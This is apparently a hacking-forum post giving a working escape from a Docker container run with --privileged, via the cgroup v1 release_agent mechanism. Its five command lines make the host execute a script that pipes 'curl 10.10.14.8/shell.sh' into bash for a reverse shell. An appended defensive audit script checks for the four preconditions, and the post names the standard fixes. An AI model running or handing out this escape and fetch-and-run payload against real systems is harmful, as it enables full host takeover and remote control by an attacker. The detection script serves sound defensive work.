Escaping a Docker container that runs with the --privileged flag.
Requirements to use this technique: the container must run with the --privileged flag. You must be running as root inside the container. The container must be run with the SYS_ADMIN Linux capability. The container must lack an AppArmor profile or otherwise allow the mount syscall. The cgroup v1 virtual filesystem must be mounted read-write inside the container.

root@container:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@container:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@container:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@container:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/shell.sh | bash' >/c; #Curl for a reverse shell with netcat listening
root@container:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

-Greyhound
just some guy
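The post lists four preconditions (root, CAP_SYS_ADMIN, a read-write cgroup v1 mount, no AppArmor confinement). As an added example, not from the post above, here is a small audit script a defender can run inside a container to test each of them from /proc; the check functions take their input as arguments so they also run against constructed sample values. The default-Docker CapEff mask used in the comments is assumed from a stock Docker install.

```bash
#!/bin/sh
# Added example: audit a container's own environment for the release_agent
# preconditions. Pure POSIX sh plus awk; no Docker access required.

# CAP_SYS_ADMIN is capability bit 21. $1 is the hex mask from the "CapEff:"
# line of /proc/self/status (e.g. 0000003fffffffff under --privileged,
# 00000000a80425fb for a default Docker container). Returns 0 when set.
has_cap_sys_admin() {
    mask=$(( 0x$1 ))
    [ $(( (mask >> 21) & 1 )) -eq 1 ]
}

# $1 is the text of /proc/self/mounts. Returns 0 if any cgroup v1 filesystem
# (type "cgroup", not "cgroup2") is mounted with the rw option.
cgroup_v1_rw_mounted() {
    printf '%s\n' "$1" | awk '
        $3 == "cgroup" && ("," $4 ",") ~ /,rw,/ { found = 1 }
        END { exit !found }'
}

# $1 is the text of /proc/self/attr/current (empty when AppArmor is absent).
# Returns 0 if a profile confines the process, 1 if unconfined.
apparmor_confined() {
    case "$1" in
        ""|unconfined|"unconfined "*) return 1 ;;
        *) return 0 ;;
    esac
}

# All four preconditions together: uid, CapEff mask, mounts text, AppArmor
# label. Returns 0 only when every one of them holds (container is exposed).
release_agent_exposed() {
    [ "$1" -eq 0 ] || return 1
    has_cap_sys_admin "$2" || return 1
    cgroup_v1_rw_mounted "$3" || return 1
    apparmor_confined "$4" && return 1
    return 0
}

# Live audit of the current container when invoked with --live.
if [ "${1:-}" = "--live" ]; then
    capeff=$(awk '/^CapEff:/ { print $2 }' /proc/self/status)
    mounts=$(cat /proc/self/mounts)
    aa=$(cat /proc/self/attr/current 2>/dev/null)
    if release_agent_exposed "$(id -u)" "$capeff" "$mounts" "$aa"; then
        echo "EXPOSED: root + CAP_SYS_ADMIN + rw cgroup v1 + no AppArmor"
    else
        echo "not exposed by this check"
    fi
fi
```

Any single failing check is enough to block this particular escape; dropping CAP_SYS_ADMIN (or not using --privileged at all) and keeping the docker-default AppArmor profile are the usual fixes.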
Messages In This Thread
Escaping a Docker container that run --priviliged flag. - by 0xgh64 - 07-01-2022, 03:53 PM